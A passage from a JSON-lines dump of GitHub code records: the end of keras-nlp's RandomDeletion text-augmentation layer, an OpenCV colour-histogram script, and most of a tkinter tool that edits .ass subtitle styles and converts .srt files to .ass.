chosen for deletion.\n max_deletions: The maximum number of tokens to delete.\n skip_list: A list of token values that should not be considered\n candidates for deletion.\n skip_fn: A function that takes as input a scalar tensor token and\n returns as output a scalar tensor True/False value. A value of\n True indicates that the token should not be considered a\n candidate for deletion. This function must be tracable--it\n should consist of tensorflow operations.\n skip_py_fn: A function that takes as input a python token value and\n returns as output `True` or `False`. 
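One fix-worthy detail in the http.py record above: report() parses session timestamps with moment.date(date, '%a %b %d $H:$M:$S %Y'), where $H:$M:$S look like typos for the %-style directives used in the rest of the pattern. A quick standalone check of the all-% form; the sample timestamp is mine, shaped like the 'First_time'/'Last_time' strings the pattern implies:

from datetime import datetime

# '%a %b %d %H:%M:%S %Y' parses 'weekday month day H:M:S year'; the '$H'
# variant would be treated as literal characters and fail to match.
ts = datetime.strptime("Mon Aug 27 14:03:05 2018", "%a %b %d %H:%M:%S %Y")
assert (ts.hour, ts.minute, ts.year) == (14, 3, 2018)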
A value of True\n indicates that should not be considered a candidate for deletion.\n Unlike the `skip_fn` argument, this argument need not be\n tracable--it can be any python function.\n seed: A seed for the random number generator.\n\n Examples:\n\n Word level usage.\n >>> keras.utils.set_random_seed(1337)\n >>> inputs=tf.strings.split([\"Hey I like\", \"Keras and Tensorflow\"])\n >>> augmenter=keras_nlp.layers.RandomDeletion(rate=0.4, seed=42)\n >>> augmented=augmenter(inputs)\n >>> tf.strings.reduce_join(augmented, separator=\" \", axis=-1)\n \n\n Character level usage.\n >>> keras.utils.set_random_seed(1337)\n >>> inputs=tf.strings.unicode_split([\"Hey Dude\", \"Speed Up\"], \"UTF-8\")\n >>> augmenter=keras_nlp.layers.RandomDeletion(rate=0.4, seed=42)\n >>> augmented=augmenter(inputs)\n >>> tf.strings.reduce_join(augmented, axis=-1)\n \n\n Usage with skip_list.\n >>> keras.utils.set_random_seed(1337)\n >>> inputs=tf.strings.split([\"Hey I like\", \"Keras and Tensorflow\"])\n >>> augmenter=keras_nlp.layers.RandomDeletion(rate=0.4,\n ... skip_list=[\"Keras\", \"Tensorflow\"], seed=42)\n >>> augmented=augmenter(inputs)\n >>> tf.strings.reduce_join(augmented, separator=\" \", axis=-1)\n \n\n Usage with skip_fn.\n >>> def skip_fn(word):\n ... return tf.strings.regex_full_match(word, r\"\\\\pP\")\n >>> keras.utils.set_random_seed(1337)\n >>> inputs=tf.strings.split([\"Hey I like\", \"Keras and Tensorflow\"])\n >>> augmenter=keras_nlp.layers.RandomDeletion(rate=0.4,\n ... skip_fn=skip_fn, seed=42)\n >>> augmented=augmenter(inputs)\n >>> tf.strings.reduce_join(augmented, separator=\" \", axis=-1)\n \n\n Usage with skip_py_fn.\n >>> def skip_py_fn(word):\n ... return len(word) < 4\n >>> keras.utils.set_random_seed(1337)\n >>> inputs=tf.strings.split([\"Hey I like\", \"Keras and Tensorflow\"])\n >>> augmenter=RandomDeletion(rate=0.4,\n ... skip_py_fn=skip_py_fn, seed=42)\n >>> augmented=augmenter(inputs)\n >>> tf.strings.reduce_join(augmented, separator=\" \", axis=-1)\n \n \"\"\"\n\n def __init__(\n self,\n rate,\n max_deletions=None,\n skip_list=None,\n skip_fn=None,\n skip_py_fn=None,\n seed=None,\n name=None,\n dtype=\"int32\",\n **kwargs,\n ):\n if not is_int_dtype(dtype) and not is_string_dtype(dtype):\n raise ValueError(\n \"Output dtype must be an integer type or a string. 
\"\n f\"Received: dtype={dtype}\"\n )\n\n super().__init__(dtype=dtype, name=name, **kwargs)\n\n self.rate = rate\n self.max_deletions = max_deletions\n self.seed = random.randint(1, 1e9) if seed is None else seed\n self._generator = tf.random.Generator.from_seed(self.seed)\n self.skip_list = skip_list\n self.skip_fn = skip_fn\n self.skip_py_fn = skip_py_fn\n if self.max_deletions is not None and self.max_deletions < 0:\n raise ValueError(\n \"max_deletions must be non-negative.\"\n f\"Received max_deletions={max_deletions}.\"\n )\n\n if self.rate > 1 or self.rate < 0:\n raise ValueError(\n \"Rate must be between 0 and 1 (both inclusive).\"\n f\"Received: rate={rate}\"\n )\n\n if [self.skip_list, self.skip_fn, self.skip_py_fn].count(None) < 2:\n raise ValueError(\n \"Exactly one of `skip_list`, `skip_fn`, `skip_py_fn` must be \"\n \"provided.\"\n )\n\n if self.skip_list:\n self.StaticHashTable = tf.lookup.StaticHashTable(\n tf.lookup.KeyValueTensorInitializer(\n tf.convert_to_tensor(self.skip_list),\n tf.convert_to_tensor([True] * len(self.skip_list)),\n ),\n default_value=False,\n )\n\n def call(self, inputs):\n inputs, unbatched, _ = convert_to_ragged_batch(inputs)\n\n skip_masks = None\n if self.skip_list:\n skip_masks = self.StaticHashTable.lookup(inputs.flat_values)\n elif self.skip_fn:\n skip_masks = tf.map_fn(\n self.skip_fn, inputs.flat_values, fn_output_signature=\"bool\"\n )\n elif self.skip_py_fn:\n\n def string_fn(token):\n return self.skip_py_fn(token.numpy().decode(\"utf-8\"))\n\n def int_fn(token):\n return self.skip_py_fn(token.numpy())\n\n py_fn = string_fn if inputs.dtype == tf.string else int_fn\n\n skip_masks = tf.map_fn(\n lambda x: tf.py_function(py_fn, [x], \"bool\"),\n inputs.flat_values,\n fn_output_signature=\"bool\",\n )\n\n positions_flat = tf.range(tf.size(inputs.flat_values))\n positions = inputs.with_flat_values(positions_flat)\n if skip_masks is not None:\n skip_masks = tf.logical_not(skip_masks)\n skip_masks.set_shape([None])\n positions = tf.ragged.boolean_mask(\n positions, inputs.with_flat_values(skip_masks)\n )\n\n # Figure out how many we are going to select.\n token_counts = tf.cast(positions.row_lengths(), \"float32\")\n num_to_select = tf.random.stateless_binomial(\n shape=tf.shape(token_counts),\n seed=self._generator.make_seeds()[:, 0],\n counts=token_counts,\n probs=self.rate,\n )\n if self.max_deletions is not None:\n num_to_select = tf.math.minimum(num_to_select, self.max_deletions)\n num_to_select = tf.cast(num_to_select, \"int64\")\n\n # Shuffle and trim to items that are going to be selected.\n def _shuffle_and_trim(x):\n positions, top_n = x\n shuffled = tf.random.shuffle(positions, seed=self.seed)\n return shuffled[:top_n]\n\n selected_for_mask = tf.map_fn(\n _shuffle_and_trim,\n (positions, num_to_select),\n fn_output_signature=tf.RaggedTensorSpec(\n ragged_rank=positions.ragged_rank - 1, dtype=positions.dtype\n ),\n )\n selected_for_mask.flat_values.set_shape([None])\n\n # Construct the mask which is a boolean RT\n # Scatter 0's to positions that have been selector for deletion.\n update_values = tf.zeros_like(selected_for_mask.flat_values, \"int32\")\n update_indices = selected_for_mask.flat_values\n update_indices = tf.expand_dims(update_indices, -1)\n update_indices = tf.cast(update_indices, \"int32\")\n mask_flat = tf.ones_like(inputs.flat_values, dtype=\"int32\")\n mask_flat = tf.tensor_scatter_nd_update(\n mask_flat, update_indices, update_values\n )\n mask = tf.cast(inputs.with_flat_values(mask_flat), \"bool\")\n\n inputs = 
tf.ragged.boolean_mask(inputs, mask)\n\n if unbatched:\n inputs = tf.squeeze(inputs, axis=0)\n\n return inputs\n\n def get_config(self):\n config = super().get_config()\n config.update(\n {\n \"rate\": self.rate,\n \"max_deletions\": self.max_deletions,\n \"seed\": self.seed,\n \"skip_list\": self.skip_list,\n \"skip_fn\": self.skip_fn,\n \"skip_py_fn\": self.skip_py_fn,\n }\n )\n return config\n\n def compute_output_shape(self, inputs_shape):\n inputs_shape = list(inputs_shape)\n inputs_shape[-1] = None\n return tuple(inputs_shape)\n","repo_name":"keras-team/keras-nlp","sub_path":"keras_nlp/layers/preprocessing/random_deletion.py","file_name":"random_deletion.py","file_ext":"py","file_size_in_byte":9989,"program_lang":"python","lang":"en","doc_type":"code","stars":594,"dataset":"github-code","pt":"67"} +{"seq_id":"20946141301","text":"#compute a color histogram for a RGB image\nimport cv2 as cv\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimg = cv.imread(\"/home/nishant/Documents/opencv/Putin.jpg\")\ncv.imshow(\"Original Image\",img)\n\nblank_img = np.zeros(img.shape[:2],dtype=\"uint8\")\n\nrec = cv.rectangle(blank_img,(81,53),(591,593),255,-1)\nmasked_color_putin = cv.bitwise_and(img,img,mask=rec)\n\ncv.imshow(\"Color Putin Face\",masked_color_putin)\n\ncolors = ('b','g','r') #tuple of colors\n\nplt.figure()\nplt.title(\"Coloured Histogram\")\nplt.xlabel(\"Bins\")\nplt.ylabel(\"Number of pixels\")\n\ncol_channels = []\ncol_color = []\n\nfor i, column in enumerate(colors):\n #enumerate(colors)=0->'b',1->'g',2->'r'\n hist = cv.calcHist([img],[i],None,[256],[0,256])\n plt.plot(hist,color=column)\n plt.xlim([0,256])\n col_channels.append(i)\n col_color.append(column)\nplt.show()\n\nprint (col_channels) #col_channels = 0,1,2(values of i in the loop)\nprint (col_color)\n\ncv.waitKey(0)","repo_name":"nishantgta/Open-CV-Projects","sub_path":"OpenCV1/histogram2.py","file_name":"histogram2.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32212692439","text":"import tkinter as tk\nfrom tkinter import ttk\nimport tkinter.filedialog as fd\nfrom tkinter import messagebox\nfrom ctypes import windll\nimport os\nimport json\nimport chardet\n\nwindll.shcore.SetProcessDpiAwareness(1)\ntext_color = 'DodgerBlue4'\n\n\ndef choose_files():\n filetypes = (('.ass files', '*.ass'), ('All files', '*.*'))\n files = fd.askopenfilenames(parent=root, title='Choose files', filetypes=filetypes)\n #messagebox.askquestion(title='Selected files', message='Do you wish to continue?')\n i = 1\n for file in files:\n files_listbox.insert(i, file)\n i += 1\n\n\ndef menu_about():\n messagebox.showinfo(title='About', message='Replace .ass ver. 
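The RandomDeletion record above keeps its doctest inputs, but the expected outputs (angle-bracketed tensor reprs) did not survive extraction. A hedged usage sketch re-running the first docstring example; it assumes a TensorFlow install with the keras_nlp package providing this layer:

import tensorflow as tf
import keras_nlp

# Word-level deletion, as in the record's first doctest: split into tokens,
# augment, then join back into strings.
inputs = tf.strings.split(["Hey I like", "Keras and Tensorflow"])
augmenter = keras_nlp.layers.RandomDeletion(rate=0.4, seed=42)
augmented = augmenter(inputs)
print(tf.strings.reduce_join(augmented, separator=" ", axis=-1))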
1.1.0\\nBy David Hay Racha')\n\n\ndef clear_fields(entry_list):\n for entry in entry_list:\n entry.delete(0, 'end')\n setdefault_checkbox.deselect()\n srt2ass_checkbox.deselect()\n name_entry.focus()\n\n\ndef clear_selected():\n files_listbox.delete(0, 'end')\n\n\ndef checkbox_check(chk_var):\n if chk_var.get() == 1:\n return True\n return False\n\ndef check_fields(var_list, default_vars):\n i = 0\n for entry in entry_list:\n if len(entry.get()) == 0:\n x = len(entry.get())\n entry.insert(0, default_vars[i])\n y = entry.get()\n i += 1\n\n'''i = 0\n for entry in entry_list:\n con = config.get(var_list[i])\n con = con.lstrip('&H')\n entry.insert(0, con)\n i += 1'''\n\n\ndef submit(chk_var, convert_box):\n check_fields(var_list, default_vars)\n chk_box_result = checkbox_check(chk_var)\n if chk_box_result:\n create_json(var_list, entry_list)\n convert_box = checkbox_check(convert_box)\n if convert_box:\n srt_list = []\n for i in range(files_listbox.size()):\n srt_list.append(files_listbox.get(i))\n new_files_name = srt_files(srt_list)\n listbox_new_files(new_files_name)\n change_files(entry_list)\n\n ## for checking ## print(chk_box_result)\n\n\ndef listbox_new_files(new_files_name):\n i = 0\n for new_file in new_files_name:\n files_listbox.insert(i, new_file)\n i += 1\n\ndef check_json():\n json_path = 'defaults.json'\n if os.path.isfile(json_path):\n return 'normal'\n return 'disabled'\n\n\ndef create_json(var_list, entry_list):\n json_exist = check_json()\n if json_exist == 'normal':\n answer = messagebox.askquestion('Defaults exists', 'The Defaults settings file already exists.'\n ' Are you sure you want to Over-Write it?\\n'\n 'Over-Writing it will ERASE all previous settings!', icon='warning')\n if answer == 'yes':\n json_dict = {}\n i = 0\n for entry in entry_list:\n if entry == primarycolor_entry or entry == secondarycolor_entry or entry == outlinecolor_entry or entry == backcolor_entry:\n con = reverse_entry(entry.get())\n else:\n con = entry.get()\n json_dict[var_list[i]] = con\n i += 1\n js_object = json.dumps(json_dict, indent=4)\n with open('defaults.json', 'w') as f:\n f.write(js_object)\n else:\n return\n\n\ndef check_encoding(file):\n with open(file, 'rb') as f:\n result = chardet.detect(f.read())\n return result['encoding']\n\n\ndef open_file(file_path, ass_string):\n file_encoding = check_encoding(file_path)\n with open(file_path, 'r', encoding=str(file_encoding)) as asf:\n content = asf.readlines()\n i = 0\n for con in content:\n if con.startswith('Style'):\n content[i] = ass_string\n with open(file_path, 'w') as cf:\n cf.writelines(content)\n i += 1\n\n\ndef change_files(entry_list):\n ass_format = ''\n for entry in entry_list:\n if entry == primarycolor_entry or entry == secondarycolor_entry or entry == outlinecolor_entry or entry == backcolor_entry:\n con = reverse_entry(entry.get())\n ass_format += con + ','\n else:\n ass_format += (entry.get() + ',')\n ass_format = 'Style: ' + ass_format\n ass_format = ass_format.rstrip(ass_format[-1])\n ass_format = ass_format + '\\n'\n file_num = files_listbox.size()\n for i in range(file_num):\n open_file(files_listbox.get(i), ass_format)\n\n clear_fields(entry_list)\n clear_selected()\n ## test ## print(files_listbox.get(i))\n\n\ndef reverse_entry(content):\n con = \"\".join(reversed([content[i:i + 2] for i in range(0, len(content), 2)]))\n return '&H' + con\n\n\ndef messages(msg):\n if msg == 1:\n messagebox.showinfo(title='Style name', message='The name of the Style. Case sensitive. 
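A quick check of reverse_entry from the Subtitler record above: .ass colours are stored as &HBBGGRR, so an RRGGBB hex string has its byte pairs reversed before the &H prefix goes on. Sample values are mine:

# reverse_entry splits the string into two-character byte pairs, reverses the
# pair order, and prefixes '&H'.
assert reverse_entry("112233") == "&H332211"
assert reverse_entry("ECEB50") == "&H50EBEC"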
Cannot include commas.')\n if msg == 2:\n messagebox.showinfo(title='Font name', message='The fontname as used by Windows. Case-sensitive.')\n if msg == 3:\n messagebox.showinfo(title='Font size', message='Literally what it says :-)')\n if msg == 4:\n messagebox.showinfo(title='Primary color', message='A long integer BGR (blue-green-red) value. ie. the byte order in the hexadecimal equivelent of this number is BBGGRR. This is the colour that a subtitle will normally appear in')\n if msg == 5:\n messagebox.showinfo(title='Secondary color', message=' A long integer BGR (blue-green-red) value. ie. the byte order in the hexadecimal equivelent of this number is BBGGRR. This colour may be used instead of the Primary colour when a subtitle is automatically shifted to prevent an onscreen collsion, to distinguish the different subtitles.')\n if msg == 6:\n messagebox.showinfo(title='Outline color', message='A long integer BGR (blue-green-red) value. ie. the byte order in the hexadecimal equivelent of this number is BBGGRR. This colour may be used instead of the Primary or Secondary colour when a subtitle is automatically shifted to prevent an onscreen collsion, to distinguish the different subtitles.')\n if msg == 7:\n messagebox.showinfo(title='Back color', message='This is the colour of the subtitle outline or shadow, if these are used. A long integer BGR (blue-green-red) value. ie. the byte order in the hexadecimal equivelent of this number is BBGGRR')\n if msg == 8:\n messagebox.showinfo(title='Bold', message='This defines whether text is bold (true) or not (false). -1 is True, 0 is False. This is independant of the Italic attribute - you can have have text which is both bold and italic.')\n if msg == 9:\n messagebox.showinfo(title='Italic', message='This defines whether text is italic (true) or not (false). -1 is True, 0 is False. This is independant of the bold attribute - you can have have text which is both bold and italic.')\n if msg == 10:\n messagebox.showinfo(title='Underline', message='This defines whether text is underlined (true) or not (false). -1 is True, 0 is False. This is independant of the bold attribute - you can have have text which is both bold and italic.')\n if msg == 11:\n messagebox.showinfo(title='Strikeout', message='This defines whether text is striked-out (true) or not (false). -1 is True, 0 is False. This is independant of the bold attribute - you can have have text which is both bold and italic.')\n if msg == 12:\n messagebox.showinfo(title='ScaleX', message='Modifies the width of the font. [percent]')\n if msg == 13:\n messagebox.showinfo(title='ScaleY', message='Modifies the height of the font. [percent]')\n if msg == 14:\n messagebox.showinfo(title='Spacing', message='Extra space between characters. [pixels]')\n if msg == 15:\n messagebox.showinfo(title='Angel', message='The origin of the rotation is defined by the alignment. Can be a floating point number. [degrees]')\n if msg == 16:\n messagebox.showinfo(title='Border style', message='1=Outline + drop shadow, 3=Opaque box')\n if msg == 17:\n messagebox.showinfo(title='Outline', message='If BorderStyle is 1, then this specifies the width of the outline around the text, in pixels. Values may be 0, 1, 2, 3 or 4.')\n if msg == 18:\n messagebox.showinfo(title='Shadow', message='If BorderStyle is 1, then this specifies the depth of the drop shadow behind the text, in pixels. Values may be 0, 1, 2, 3 or 4. 
Drop shadow is always used in addition to an outline - SSA will force an outline of 1 pixel if no outline width is given.')\n if msg == 19:\n messagebox.showinfo(title='Alignment', message='This sets how text is \"justified\" within the Left/Right onscreen margins, and also the vertical placing. Values may be 1=Left, 2=Centered, 3=Right. Add 4 to the value for a \"Toptitle\". Add 8 to the value for a \"Midtitle\". eg. 5 = left-justified toptitle. but after the layout of the numpad (1-3 sub, 4-6 mid, 7-9 top).')\n if msg == 20:\n messagebox.showinfo(title='MarginL', message='This defines the Left Margin in pixels. It is the distance from the left-hand edge of the screen.The three onscreen margins (MarginL, MarginR, MarginV) define areas in which the subtitle text will be displayed.')\n if msg == 21:\n messagebox.showinfo(title='MarginR', message='This defines the Right Margin in pixels. It is the distance from the right-hand edge of the screen. The three onscreen margins (MarginL, MarginR, MarginV) define areas in which the subtitle text will be displayed.')\n if msg == 22:\n messagebox.showinfo(title='MarginV', message='This defines the vertical Left Margin in pixels. For a subtitle, it is the distance from the bottom of the screen. For a toptitle, it is the distance from the top of the screen. For a midtitle, the value is ignored - the text will be vertically centred')\n if msg == 23:\n messagebox.showinfo(title='Encoding', message='This specifies the font character set or encoding and on multi-lingual Windows installations it provides access to characters used in multiple than one languages. It is usually 0 (zero) for English (Western, ANSI) Windows. When the file is Unicode, this field is useful during file format conversions.')\n\n\n#def trim_left(content):\n# return content.strip('&H')\n\n\ndef load_defaults():\n with open('defaults.json', 'r') as f:\n config = json.load(f)\n i = 0\n for entry in entry_list:\n con = config.get(var_list[i])\n con = con.lstrip('&H')\n entry.insert(0, con)\n i += 1\n\n\ndef trimlinenum(line):\n line.pop(0)\n #print(line)\n return line\n\ndef timeline(line):\n start = str(line[1:11])\n start = start.replace(',', '.')\n end = str(line[18:28])\n end = end.replace(',', '.')\n #print(start, end)\n return start, end\n\ndef get_text(line):\n\n line = (''.join(line))\n line = line.rstrip()\n return line.replace('\\n', '\\\\N')\n\n\ndef check_utf():\n pass\n\n\ndef change_file_name(filename):\n return filename.replace('srt', 'ass')\n\n\ndef srt_files(files):\n hardcoded = ['[Script Info]', 'ScriptType: v4.00+', 'Collisions: Normal', 'PlayResX: 384', 'PlayResY: 288',\n 'Timer: 100.0000', '\\n\\n', '[V4+ Styles]', 'Format: Name, Fontname, Fontsize, PrimaryColour, SecondaryColour, OutlineColour, BackColour, Bold, Italic, Underline, StrikeOut, ScaleX, ScaleY, Spacing, Angle, BorderStyle, Outline, Shadow, Alignment, MarginL, MarginR, MarginV, Encoding',\n 'Style: Default,Tahoma,24,&H00ECEB50,&H00FFFFFF,&H00FFFFFF,&H00C0C0C0,-1,0,0,0,100,100,0,0.00,1,2,3,2,20,20,20,1',\n '\\n\\n', '[Events]', 'Format: Layer, Start, End, Style, Actor, MarginL, MarginR, MarginV, Effect, Text']\n #filetypes = ('All files', '*.*')\n #files = fd.askopenfilenames(parent=root, title='Choose files')#, filetypes=filetypes)\n #messagebox.askquestion(title='Selected files', message='Do you wish to continue?')\n file = ''\n\n sub_first = 'Dialogue: 0'\n asssublines = []\n new_file_list = []\n for file in files:\n subline = []\n sublines = []\n #file += item\n new_file = change_file_name(file)\n 
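The [1:11] and [18:28] slices in timeline() above do real work: an SRT timing line holds two 12-character timestamps ('00:00:01,000 --> 00:00:04,500'), and dropping each one's leading hour digit and final millisecond digit yields the .ass form (single-digit hours, centiseconds) once the comma becomes a dot. A worked example with a sample timing line of mine:

t = "00:00:01,000 --> 00:00:04,500"
start = t[1:11].replace(",", ".")  # -> '0:00:01.00'
end = t[18:28].replace(",", ".")   # -> '0:00:04.50'
assert (start, end) == ("0:00:01.00", "0:00:04.50")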
new_file_list.append(new_file)\n file_encoding = check_encoding(file)\n with open(file, 'r', encoding=file_encoding) as f:\n con = f.readlines()\n '''if con[len(con) - 1] == '\\n':\n con = con[:-1]'''\n while con[len(con) - 1] == '\\n':\n con = con[:-1]\n for item in con:\n if item != '\\n':\n subline.append(item)\n else:\n sublines.append(subline)\n subline = []\n sublines.append(subline)\n\n #print(sublines)\n #asssub = ''\n\n #sub_Stime = ''\n #sub_Etime = ''\n #sub_text = ''\n\n for line in sublines:\n #print(line)\n asssub = ''\n line = trimlinenum(line)\n sub_start, sub_end = timeline(line[0])\n sub_text = get_text(line[1:len(line)])\n asssub = f'{sub_first},{sub_start},{sub_end},Default,,0000,0000,0000,,{sub_text}'\n asssublines.append(asssub)\n\n #sublines = []\n #print(asssub)\n #print(asssublines)\n\n with open(new_file, 'w', encoding='utf-8') as f:\n for item in hardcoded:\n f.write('%s\\n' % item)\n\n with open(new_file, 'a', encoding='utf-8') as f:\n for assline in asssublines:\n f.write('%s\\n' % assline)\n asssublines = []\n return new_file_list\n\n\n\n\n\n# Create the main window\n\nroot = tk.Tk()\nroot.title('Subtitler')\nroot.geometry('458x600+350+150')\n#root.iconbitmap('assets/reminder.ico')\n\n\n# Create variables\n\nName = tk.StringVar()\nFontname = tk.StringVar()\nFontsize = tk.StringVar()\nPrimaryColour = tk.StringVar()\nSecondaryColour = tk.StringVar()\nOutlineColour = tk.StringVar()\nBackColour = tk.StringVar()\nBold = tk.StringVar()\nItalic = tk.StringVar()\nUnderline = tk.StringVar()\nStrikeOut = tk.StringVar()\nScaleX = tk.StringVar()\nScaleY = tk.StringVar()\nSpacing = tk.StringVar()\nAngle = tk.StringVar()\nBorderStyle = tk.StringVar()\nOutline = tk.StringVar()\nShadow = tk.StringVar()\nAlignment = tk.StringVar()\nMarginL = tk.StringVar()\nMarginR = tk.StringVar()\nMarginV = tk.StringVar()\nEncoding = tk.StringVar()\nsetasdefault = tk.IntVar()\nsrt2ass = tk.IntVar()\ndefault_vars = ['Default', 'Tahoma', '24', 'FFFFFF', 'FFFFFF', 'FFFFFF', 'C0C0C0', '-1', '0', '0', '0', '100', '100',\n '0', '0.00', '1', '2', '3', '2', '20', '20', '20', '1']\n\nvar_list = ['Name', 'Fontname', 'Fontsize', 'PrimaryColour', 'SecondaryColour', 'OutlineColour', 'BackColour', 'Bold',\n 'Italic', 'Underline', 'StrikeOut', 'ScaleX', 'ScaleY', 'Spacing', 'Angle', 'BorderStyle', 'Outline',\n 'Shadow', 'Alignment', 'MarginL', 'MarginR', 'MarginV', 'Encoding']\n\n# Create Main Menu Bar\nmenu_bar = tk.Menu(root)\nroot.config(menu=menu_bar)\n\n# Create File Menu\n\nfile_menu = tk.Menu(menu_bar, tearoff=False)\nmenu_bar.add_cascade(label='File', menu=file_menu)\nfile_menu.add_command(label='Save as Default')\nfile_menu.add_separator()\nfile_menu.add_command(label='Submit')\nfile_menu.add_separator()\nfile_menu.add_command(label='Exit', command=root.quit)\n\n\n# Create Edit Menu\n\nedit_menu = tk.Menu(menu_bar, tearoff=False)\nmenu_bar.add_cascade(label='Edit', menu=edit_menu)\nedit_menu.add_command(label='Reset to Original')\nedit_menu.add_command(label='Clear fields', command=lambda: clear_fields(entry_list))\nedit_menu.add_command(label='Clear files', command=lambda : clear_selected())\n\n# Create Help Menu\n\nhelp_menu = tk.Menu(menu_bar, tearoff=False)\nmenu_bar.add_cascade(label='Help', menu=help_menu)\nhelp_menu.add_command(label='About', command=menu_about)\n\n# main window label\n\nmain_label = ttk.Label(root, text='Change .ass subtitle style', foreground=text_color, font=('Ariel', 14, 'bold'))\nmain_label.place(x=100, y=10)\n\n\n# name label and entry\n\nname_label = ttk.Label(root, 
text='Name:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nname_label.place(x=20, y=50)\nname_label.bind('', lambda e: messages(1))\nname_entry = tk.Entry(root, textvariable=Name)\nname_entry.place(x=20, y=70)\nname_entry.focus()\n\n\n# font name label and entry\n\nfontname_label = ttk.Label(root, text='Font Name:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nfontname_label.place(x=166, y=50)\nfontname_label.bind('', lambda e: messages(2))\nfontname_entry = tk.Entry(root, textvariable=Fontname)\nfontname_entry.place(x=166, y=70)\n\n\n# font size label and entry\n\nfontsize_label = ttk.Label(root, text='Font Size:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nfontsize_label.place(x=312, y=50)\nfontsize_label.bind('', lambda e: messages(3))\nfontsize_entry = tk.Entry(root, textvariable=Fontsize)\nfontsize_entry.place(x=312, y=70)#, width=61)\n\n\n# primary color label and entry\n\nprimarycolor_label = ttk.Label(root, text='Primary Color:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nprimarycolor_label.place(x=20, y=100)\nprimarycolor_label.bind('', lambda e: messages(4))\nprimarycolor_entry = tk.Entry(root, textvariable=PrimaryColour)\nprimarycolor_entry.place(x=20, y=120, width=89.5)\n\n\n# secondary color label and entry\n\nsecondarycolor_label = ttk.Label(root, text='Secondary Color:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nsecondarycolor_label.place(x=129.5, y=100)\nsecondarycolor_label.bind('', lambda e:messages(5))\nsecondarycolor_entry = tk.Entry(root, textvariable=SecondaryColour)\nsecondarycolor_entry.place(x=129.5, y=120, width=89.5)\n\n\n# outline color label and entry\n\noutlinecolor_label = ttk.Label(root, text='Outline Color:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\noutlinecolor_label.place(x=239, y=100)\noutlinecolor_label.bind('', lambda e:messages(6))\noutlinecolor_entry = tk.Entry(root, textvariable=OutlineColour)\noutlinecolor_entry.place(x=239, y=120, width=89.5)\n\n\n# back coloe label and entry\n\nbackcolor_label = ttk.Label(root, text='Back Color:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nbackcolor_label.place(x=348.5, y=100)\nbackcolor_label.bind('', lambda e:messages(7))\nbackcolor_entry = tk.Entry(root, textvariable=BackColour)\nbackcolor_entry.place(x=348.5, y=120, width=89.5)\n\n\n# bold label and entry\n\nbold_label = ttk.Label(root, text='Bold:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nbold_label.place(x=20, y=150)\nbold_label.bind('', lambda e:messages(8))\nbold_entry = tk.Entry(root, textvariable=Bold)\nbold_entry.place(x=20, y=170, width=89.5)\n\n\n# italic label and entry\n\nitalic_label = ttk.Label(root, text='Italic:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nitalic_label.place(x=129.5, y=150)\nitalic_label.bind('', lambda e:messages(9))\nitalic_entry = tk.Entry(root, textvariable=Italic)\nitalic_entry.place(x=129.5, y=170, width=89.5)\n\n\n# under line label and entry\n\nunderline_label = ttk.Label(root, text='Underline:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nunderline_label.place(x=239, y=150)\nunderline_label.bind('', lambda e:messages(10))\nunderline_entry = tk.Entry(root, textvariable=Underline)\nunderline_entry.place(x=239, y=170, width=89.5)\n\n\n# strikeout label and entry\n\nstrikeout_label = ttk.Label(root, text='Strikeout:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nstrikeout_label.place(x=348.5, y=150)\nstrikeout_label.bind('', lambda 
e:messages(11))\nstrikeout_entry = tk.Entry(root, textvariable=StrikeOut)\nstrikeout_entry.place(x=348.5, y=170, width=89.5)\n\n\n# scaleX label and entry\n\nscalex_label = ttk.Label(root, text='ScaleX:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nscalex_label.place(x=20, y=200)\nscalex_label.bind('', lambda e:messages(12))\nscalex_entry = tk.Entry(root, textvariable=ScaleX)\nscalex_entry.place(x=20, y=220, width=89.5)\n\n\n# scaleY label and entry\n\nscaley_label = ttk.Label(root, text='ScaleY:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nscaley_label.place(x=129.5, y=200)\nscaley_label.bind('', lambda e:messages(13))\nscaley_entry = tk.Entry(root, textvariable=ScaleY)\nscaley_entry.place(x=129.5, y=220, width=89.5)\n\n\n# spacing label and entry\n\nspacing_label = ttk.Label(root, text='Spacing:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nspacing_label.place(x=239, y=200)\nspacing_label.bind('', lambda e:messages(14))\nspacing_entry = tk.Entry(root, textvariable=Spacing)\nspacing_entry.place(x=239, y=220, width=89.5)\n\n\n# angel label and entry\n\nangel_label = ttk.Label(root, text='Angel:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nangel_label.place(x=348.5, y=200)\nangel_label.bind('', lambda e:messages(15))\nangel_entry = tk.Entry(root, textvariable=Angle)\nangel_entry.place(x=348.5, y=220, width=89.5)\n\n\n# border style label and entry\n\nborderstyle_label = ttk.Label(root, text='Border Style:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nborderstyle_label.place(x=20, y=250)\nborderstyle_label.bind('', lambda e:messages(16))\nborderstyle_entry = tk.Entry(root, textvariable=BorderStyle)\nborderstyle_entry.place(x=20, y=270, width=89.5)\n\n\n# outline label and entry\n\noutline_label = ttk.Label(root, text='Outline:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\noutline_label.place(x=129.5, y=250)\noutline_label.bind('', lambda e:messages(17))\noutline_entry = tk.Entry(root, textvariable=Outline)\noutline_entry.place(x=129.5, y=270, width=89.5)\n\n\n# shadow label and entry\n\nshadow_label = ttk.Label(root, text='Shadow:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nshadow_label.place(x=239, y=250)\nshadow_label.bind('', lambda e:messages(18))\nshadow_entry = tk.Entry(root, textvariable=Shadow)\nshadow_entry.place(x=239, y=270, width=89.5)\n\n\n# alignment label and entry\n\nalignment_label = ttk.Label(root, text='Alignment:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nalignment_label.place(x=348.5, y=250)\nalignment_label.bind('', lambda 